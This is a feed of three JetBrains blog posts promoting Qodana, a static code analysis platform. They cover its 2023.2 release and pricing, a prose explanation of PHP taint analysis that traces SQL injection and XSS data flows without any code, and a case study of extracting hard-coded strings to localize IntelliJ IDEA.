Forem: Valerie Kuzmina

Qodana Is Out Of Preview With First-Class JetBrains IDE Integration

Valerie Kuzmina — Fri, 21 Jul 2023 08:33:58 +0000

JetBrains has always strived to deliver tools that make developers’ work enjoyable, creative, and thought-provoking. JetBrains IDEs are designed to understand code and provide valuable suggestions for improving it. Having these tips available in the editor is incredibly helpful. But modern CI-centric workflows require a reliable quality gate in your build pipeline. With that in mind, we created Qodana.

Qodana is the only code quality platform on the market that uses inspections native to JetBrains IDEs and expands the smartness of your JetBrains IDE to the CI server.

We built this powerful static analysis engine to enable development teams to automate code reviews, build quality gates, and enforce code quality guidelines enterprise-wide – all within their JetBrains ecosystem. The platform can be integrated into any CI/CD pipeline and can analyze code written in 60+ languages, including Java, JavaScript, TypeScript, PHP, Kotlin, Python, Go, and C#.

Today, Qodana announces a huge milestone: It’s no longer in preview and is available commercially with some major improvements. Get in now to enjoy a 50% discount on your first year.

Try Qodana for free

What’s new in Qodana 2023.2

Many of you have been wondering where the name “Qodana” came from. Let us explain.

“Qodana” stands for “code analyzer”.

Back in 2021, after weeks of fruitless brainstorming on the product’s name, we turned to one of our polyglot colleagues for guidance. Ten minutes later, she suggested “Qodana” and right away we knew that was it.

Since launching Qodana in EAP in 2021, we’ve been overjoyed by the response. To date, Qodana analyzes commits to over 9K unique projects on a monthly basis – 80% of these projects are commercial.

Our early adopters have taught us a lot about what they need, and we’ve used that knowledge to make some major improvements to the static code analysis engine of Qodana.

1. Server-side analysis by Qodana is now fully integrated with JetBrains IDEs 2023.2

Static analysis tools are known to be complicated to configure. With the Qodana 2023.2 release, we’ve eliminated this pain by fully integrating our code quality platform with almost all JetBrains IDEs: IntelliJ IDEA, WebStorm, PhpStorm, PyCharm, Rider, and GoLand. Please note that this functionality won’t be available until the release of the 2023.2 versions of our IDEs.

This integration will bring two important benefits.

The first benefit is the ease of configuration. You can try the local analysis with just a few clicks, view the list of problems across your entire project, and then configure Qodana in your preferred CI/CD system to establish the quality gate and run server-side checks.

The second benefit is an improved code quality workflow. Once Qodana is configured in the continuous integration server, you’ll be able to see the results of the server-side analysis without leaving the IDE – right out of the box. Alternatively, you can navigate directly to Qodana Cloud to see the issue overview in a straightforward sunburst diagram.

2. Code coverage support

Qodana now supports processing code coverage for Java, Kotlin, PHP, JavaScript and TypeScript. While running automated tests, Qodana will display how much of the code has been executed by relying on the output from the known unit testing frameworks. This way, users will be able to 1) review the degree of code coverage, 2) spot parts of the code that need more testing, 3) assess the quality of the tests themselves.

3. Vulnerability checker based on the Checkmarx data

Now Qodana is bundled with the vulnerability checker, powered by IntelliJ IDEA. This inspection is designed to spot vulnerable external packages used in the project. The data about vulnerabilities is provided by the software security company Checkmarx.

The vulnerability checker goes beyond just providing security information. It also offers valuable remediation insights. Developers can take immediate action to address vulnerabilities by quickly migrating to a safe and stable version of the package without known vulnerability issues.

4. Quick-fixes (experimental)

All Qodana linters (except for .NET) will provide users with the power of quick-fixes to boost their coding efficiency. Qodana is now able to apply quick-fixes to issues that can be resolved automatically and create a new pull request with the applied changes (currently available only for GitHub Actions). Then, the user will be able to review these changes before committing.

For the complete list of changes, refer to What’s new in Qodana 2023.2.

Qodana features beyond the 2023.2 release

In case you haven’t tried Qodana yet, here’s a brief overview of features that are currently available in the product – beyond the newly released ones.

2500+ code inspections – exclusive Qodana inspections included

Qodana can spot performance issues, unused declarations, vulnerable dependencies, potential security issues, confusing code constructs, naming and style conventions, and much more.

Interactive inspection reports and dashboards

Discover issues and trends in your code and better understand the quality of your project with our fancy sunburst diagram.

Cloud-based overview of reports

You can accumulate all of your Qodana reports in a single place – Qodana Cloud – and explore project trends with interactive dashboards.

The baseline for getting your technical debt under control

A snapshot of the codebase, or baseline, is taken during specific Qodana runs. You can compare your current code with its baseline state and see new, unchanged, and resolved problems.

For example, you can use the baseline to put less critical issues on the back burner and focus on fixing bugs that are either new or highly critical.

Third-party license audit

Scan dependencies in your code repository to find their licenses and see if they’re compatible with your project license.

Inspection constructor

Looking to scan for a specific problem that Qodana doesn’t cover yet? You can integrate it with third-party inspection tools or create your own plugins.

A video is worth a thousand words, so please feel free to check out the Qodana overview video by our Developer Advocate.

Qodana pricing that makes managers say “Wow”

What decision-makers especially like about Qodana is that we charge per active contributor, regardless of the number of lines in the project. This makes Qodana an especially cost-efficient offer.

Qodana is available in three plans, including a free plan with limited language support, and paid plans starting from $6 per active contributor per month. Paid plans require minimum of 3 active contributors.

The most advanced Qodana plan, which offers more security inspections and the license audit, comes with a one-year 50% discount!

How to get started with Qodana?

Simply head to our website and claim your free trial! You’ll be asked to create an account in Qodana Cloud and connect the specified linter to your project and preferred CI/CD system. It’s that easy!

Our mission is to help developers deliver code they can be proud of. We hope you enjoy Qodana and all the intelligence it packs into a straightforward sunburst diagram. If you have any questions, feel free to submit a ticket to the issue tracker or leave a comment below.

Secure Your PHP Code With Taint Analysis by Qodana

Valerie Kuzmina — Fri, 10 Mar 2023 14:16:23 +0000

It only takes one user to exploit a vulnerability in your project and breach your system. To defend programs against malicious inputs from external users (known as “taints”), development teams add taint checking to their static analysis routines.

In this year’s first release, the Qodana team has delivered taint analysis for PHP in the EAP. The feature is available only in Qodana for PHP 2023.1 (jetbrains/qodana-php:2023.1-eap). Qodana for PHP was the first linter we released, so we decided to let PHP developers be the first to test our new security functionality, too. We plan on adding more languages in the future, after we’ve collected enough feedback.

Read on to learn more about what taint analysis is and how it works in Qodana.

GET STARTED WITH QODANA

What is taint analysis?

A taint is any value that can pose a security risk when modified by an external user. If you have a taint in your code and unverified external data can be distributed across your program, hackers can execute these code fragments to cause SQL injection, arithmetic overflow, cross-site scripting, path traversal, and more. Usually they exploit these vulnerabilities to destroy the system, hijack credentials and other data, and change the system’s behavior.

Example of a taint. Arbitrary data from the GET parameter is displayed on the screen. For example, malicious users can exploit this vulnerability to tamper with your program’s layout.

As an extra layer of defense against malicious inputs, development teams execute taint analysis when they run a security audit on the program’s attack surface.

Taint analysis is the process of assessing the flow of untrusted user input throughout the body of a function or method. Its core goal is to determine if unanticipated input can affect program execution in malicious ways.

Taint sources are locations where a program gets access to potentially tainted data. Key points in a program that are susceptible to allowing tainted input are called taint sinks. This data can be propagated to the sinks via function calls or assignments.

If you run taint analysis manually, you should spot all of the places where you accept data from external users and follow each piece of data through the system – the tainted data can be used in dozens of nodes. Then, to prevent taint propagation, you should take one of the two approaches described below:

Sanitize the data, i.e. transform data to a safe state. In the example below, we removed tags to resolve the taint.

Validate the data, i.e. check that the added data conforms to a required pattern. In the example below, we enable validation for the $email variable.

In other words, the taint analysis inspection traces user-tainted data from its source to your sinks, and raises the alarm when you work with that data without sanitizing or validating it.

How taint analysis works in Qodana

Taint analysis is performed by Qodana for PHP starting from version 2023.1 EAP. This functionality includes an inspection that scans the code and highlights the taint and potential vulnerability, the ability to open the problem in PhpStorm to address it on the spot, and a dataflow graph visualizing the taint flow.

Example #1. SQL injection

Let’s take a look at an example of SQL injection and how Qodana detects it:

Here, Qodana shows us the following taints in the system_admin() function:

Markers 1-2: Data from user form input is retrieved from the $_POST global array with no sanitization or validation and is assigned to the variable $edit. This is a taint.

Marker 3: The tainted variable $edit is passed to the system_save_settings function as an argument without any proper sanitization.

Marker 4: Data from the $edit variable is now located in the $edit parameter.

Marker 5: The $edit variable is passed to foreach with the $filename key and $status value. Both variables contain the tainted data from the $edit variable concatenated with the string. The $filename key is concatenated with a tainted SQL string, and then it will propagate tainted data into an argument passed to the db_query.

Marker 6: The $ filename key contains the tainted data from the $edit variable concatenated with the string.

Marker 7: The $ filename key is concatenated with a tainted SQL string.

Marker 8: Tainted SQL string will propagate tainted data into an argument passed to the db_query

Let’s now look at the db_query:

Marker 9: The tainted string will be located in the $query parameter.

Marker 10: This parameter is going to be an argument of the _db_query function.

Let’s move on to the _db_query function:

Marker 11: Tainted data located in the first parameter $ query of the _db_query function.

Marker 12: Data of the parameter is passed to the mysql_query function, which is a sink.

The whole data flow above illustrates how data moves from $_POST[“edit”] to the mysql_query($query) without any sanitization or validation. This allows the attacker to manipulate the SQL query which was concatenated with a key of $_POST[“edit”] and trigger SQL injection.

Qodana will spot these risks in your codebase along with all nodes where tainted data is used, so you can sanitize all tainted data in a timely manner.

Example #2. XSS problem

In the Qodana UI, you can see a graph that visualizes the entire taint flow. Here’s how Qodana will visualize the XSS vulnerability, which contains 2 sources that would be merged on marker 5.

Source 1

Markers 1-2: Data from the searchUpdate.pos file will be read and tainted data will be assigned to the $start variable.

Source 2

Markers 3-4: Data from files whose path is located in $posFile will be read and tainted data will be assigned to the $start variable.

Marker 5: A merged tainted state from all conditional branches in the $start variable will be passed as an argument to the doUpdateSearchIndex method.

Let’s look inside the doUpdateSearchIndex() method:

Markers 6-8: The $ start parameter will contain tainted data on this dataflow slice and then it will be passed within a concatenated string as an argument to the output method.

Let’s look inside the output method:

Marker 9: Tainted data contained inside the transmitted string will be located in the $out parameter.

Marker 10: Data from the $out parameter will be transferred to the print function without any sanitization. This function is a sink and causes XSS vulnerability, which can be exploited.

To exploit the vulnerability, an attacker can, for example, upload a shell script instead of the expected files in markers 1 and 2, and will be able to put any information onto the web page as a result of an unsanitized print function.

Qodana will alert you to this vulnerability and give it a high priority so that you can resolve it as soon as possible and prevent the hack.

Conclusion

Taint analysis helps eliminate exploitable attack surfaces, so it’s an effective method to reduce risk to your software. To learn about taint analysis and Qodana in detail, explore Qodana documentation.

Happy developing and keep your code healthy!

GET STARTED WITH QODANA

Qodana and IntelliJ IDEA: How a Code Quality Platform Streamlined the Localization of an IDE

Valerie Kuzmina — Mon, 23 Jan 2023 10:33:23 +0000

Have you ever wondered how to make sure that your determination to live a healthier life, not sweat the small stuff, and work smarter, not harder continues past Valentine’s Day? Psychologists say that breaking big goals into small steps is the best way to stick to your New Year’s resolutions.

This advice applies to programmers’ resolutions too. If you plan a large project that involves code refactoring, you may want to see the full picture of the required changes and plan accordingly. This is exactly what the IntelliJ team did when they needed to localize the IDE’s entire UI into Chinese, Japanese, and Korean.

Using Qodana, the code quality platform from JetBrains, as a single source of truth for their localization process, the IntelliJ team managed to finish the project much faster than expected. This positive outcome was a result of wise planning, accountability, and oversight. Here’s how they did it.

TRY QODANA FOR FREE

The challenge: isolate 13,000 hard-coded strings and monitor progress effectively

To streamline the localization of their UI into 3 different languages, the IntelliJ team needed to strip out all localizable items from the source code and put them into separate properties files to be handed over for translation.

With over 13,000 strings, it was easy for some localizable ones to be overlooked, meaning that they remained in the code. When localizing the UI, hard-coded strings can be the most difficult parts to deal with. They are hard to find because they do not show up until the software has been localized. As a result, if a user installed the Japanese language pack, for example, some parts of the UI would still be in English.

The team was therefore left with much tedious and repetitive work. As a result the head of the localization project was looking for a solution that would allow them to:

Automate a huge chunk of the work by continuously inspecting the code base for hard-coded string literals.
Assign issues to the developers who would be responsible for fixing them.
Oversee the extraction of localizable strings.

The solution: automated code inspection for hard-coded string literals

The localization project lead chose Qodana to streamline the code inspection process, resulting in a project with the following steps:

#1. Connect Qodana to TeamCity

The IntelliJ team connected Qodana to their TeamCity pipeline and enabled the Internationalization code inspection to highlight hard-coded string literals that were not extracted into properties files as required.

#2. Configure the inspection profile

In the inspection profile, the team configured the scope of the inspection to make sure that the platform skipped parts like legacy code, literals without alphabetic characters, and strings consisting of only whitespace.

The team also made sure that TeamCity would produce a test report for each line inspected by Qodana and fail it if the string wasn’t extracted.

#3. Decide on the frequency of scans

Once fully configured, Qodana was set to inspect the code every 4 hours. It was especially important that the scan was running independently on the server, as opposed to on someone’s local machine. This ultimately saved the team valuable time.

The first Qodana run resulted in 10,000 failed tests in TeamCity.

Overview of the failed tests.

Qodana flags the hard-coded string literal remaining in the code as an error in the internationalized environment.

#4. Assign tasks

For each of the test failures, the project lead assigned a developer to investigate and extract the hard-coded string to the properties file.

How the assigned test is displayed in TeamCity.

#5. Monitor the results

After each Qodana inspection, TeamCity compared the previous results to the current report. If the developer responsible for an issue extracted the string, TeamCity marked the test as fixed. This allowed the project lead to monitor the progress without having to manually mark tests as fixed.

Additionally, the team was able to monitor progress in the Qodana Cloud dashboard, which updated information on the remaining code issues in real time and compared results between different Qodana runs.

_The Qodana Cloud dashboard example. _

Qodana also allowed adding selected issues to the baseline, otherwise known as the technical debt section. This way, the entire team could see the same list of issues and monitor progress right in the platform. Below is an example of how this works.

The Qodana baseline feature.

The key outcomes

In only a few months, the number of failed tests dropped from 10,000 to zero , an average of about 175 fixed tests per day. The team successfully removed all hard-coded string literals from the source code and the whole UI was localized seamlessly, with no unexpected elements in English.

With Qodana, the IntelliJ team required fewer manual steps in the localization process, thereby reducing the number of human errors and increasing confidence in the localized builds. Additionally, with checks running every 4 hours, they were able to detect issues sooner and prevent small problems from turning into big ones later on.

Finally, Qodana became the single source of truth for the team lead, making it easy to ensure that developers fixed the problems they were assigned.

Thanks to these results, the IntelliJ team will keep using Qodana as a code quality and resource planning platform when they deliver new functionalities or improve IntelliJ IDEA’s performance. More on that in our upcoming posts.

GET STARTED WITH QODANA

Happy developing and keep your code clean!